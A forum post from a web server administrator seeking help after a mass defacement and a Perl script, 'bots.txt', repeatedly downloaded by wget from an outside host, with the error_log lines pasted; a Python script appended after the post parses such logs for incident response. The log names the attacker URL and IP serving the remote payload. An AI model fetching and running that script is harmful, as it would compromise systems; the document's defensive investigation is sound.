Hi,
I'm running an older version of Apache, 1.3.28, under a SuSE install.
Today I noticed that somehow a bots.txt Perl program is being run, yet it is not run from the filesystem. Somehow this script is being downloaded and run.
Yesterday the server was also the victim of an attack, a PSYCH@ mass defacement. I don't know if these two attacks are related in any way, but I certainly need help to figure out what to do!
Does anyone know anything related to running this
bots.txt? Here's what I have in my error_log:
--11:51:13-- http://tehboob.be/bots.txt
--11:51:13-- http://tehboob.be/bots.txt
=> `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 683.08 KB/s

11:51:13 (683.08 KB/s) - `bots.txt' saved [29378/29378]

--12:15:55-- http://tehboob.be/bots.txt
=> `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 683.08 KB/s

12:15:55 (683.08 KB/s) - `bots.txt' saved [29378/29378]

--12:22:25-- http://tehboob.be/bots.txt
=> `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 652.03 KB/s

12:22:25 (652.03 KB/s) - `bots.txt' saved [29378/29378]

--12:44:05-- http://tehboob.be/bots.txt
=> `bots.txt'
Resolving tehboob.be... done.
Connecting to tehboob.be[72.20.8.243]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,378 [text/plain]

0K .......... .......... ........ 100% 652.03 KB/s

I have blocked traffic to prevent retrieving this script from tehboob.be, but that is only a temporary workaround. How is this program being run? This is the top-level error_log and I don't understand how a Perl program is being downloaded and then run.
As for the mass defacement "By PSYch@ AYYILDIZ-TIM", does anyone know anything about that? Basically all of the index.html, index.htm and index.php files (in all sites) were replaced.
One thing I was able to tell via lsof is that the program running bots.txt was accessing all of the /var/log/httpd/* logs, so I'm guessing that they were collecting website information?
PLEASE HELP...
Thanks
Ricardo
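A defender-side check for exactly this pattern, added here as an example and not part of Ricardo's post: it parses the wget transcripts that a web application's child process leaves in error_log, counts how often the remote script was fetched from which host and IP, and lists which fetches actually completed. The abridged sample log and the field names are my own assumptions.

```python
import re
from collections import Counter

# wget writes its progress transcript to stderr; when a CGI/PHP process
# spawns wget, Apache captures that stderr in error_log.
START_RE = re.compile(r"--(\d\d:\d\d:\d\d)--\s+(\S+)")
CONNECT_RE = re.compile(r"Connecting to ([^\[\s]+)\[([0-9.]+)\]:(\d+)")
SAVED_RE = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")

# Constructed sample, abridged from the error_log quoted in the post above.
SAMPLE_ERROR_LOG = """\
--11:51:13-- http://tehboob.be/bots.txt
=> `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected.
11:51:13 (683.08 KB/s) - `bots.txt' saved [29378/29378]
--12:15:55-- http://tehboob.be/bots.txt
=> `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected.
12:15:55 (683.08 KB/s) - `bots.txt' saved [29378/29378]
--12:44:05-- http://tehboob.be/bots.txt
=> `bots.txt' Resolving tehboob.be... done. Connecting to tehboob.be[72.20.8.243]:80... connected.
"""

def parse_wget_fetches(text):
    """Return one dict per '--HH:MM:SS-- URL' transcript in text; works whether
    the transcripts sit on separate lines or are run together on one line."""
    fetches = []
    starts = list(START_RE.finditer(text))
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(text)
        chunk = text[m.start():end]
        f = {"time": m.group(1), "url": m.group(2), "host": "", "ip": "",
             "port": 0, "saved_as": "", "size": 0, "complete": False}
        c = CONNECT_RE.search(chunk)
        if c:
            f["host"], f["ip"], f["port"] = c.group(1), c.group(2), int(c.group(3))
        s = SAVED_RE.search(chunk)
        if s:  # a 'saved [n/n]' line means the payload actually landed on disk
            f["saved_as"], f["size"] = s.group(1), int(s.group(2))
            f["complete"] = s.group(2) == s.group(3)
        fetches.append(f)
    return fetches

def fetch_summary(fetches):
    """Count fetches per (url, ip) and list the times of completed downloads."""
    counts = Counter((f["url"], f["ip"]) for f in fetches)
    completed = [f["time"] for f in fetches if f["complete"]]
    return counts, completed

if __name__ == "__main__":
    counts, done = fetch_summary(parse_wget_fetches(SAMPLE_ERROR_LOG))
    print(dict(counts), done)
```

The completion times are what to correlate with access_log requests and with the parent process lsof shows, to find which script is spawning wget.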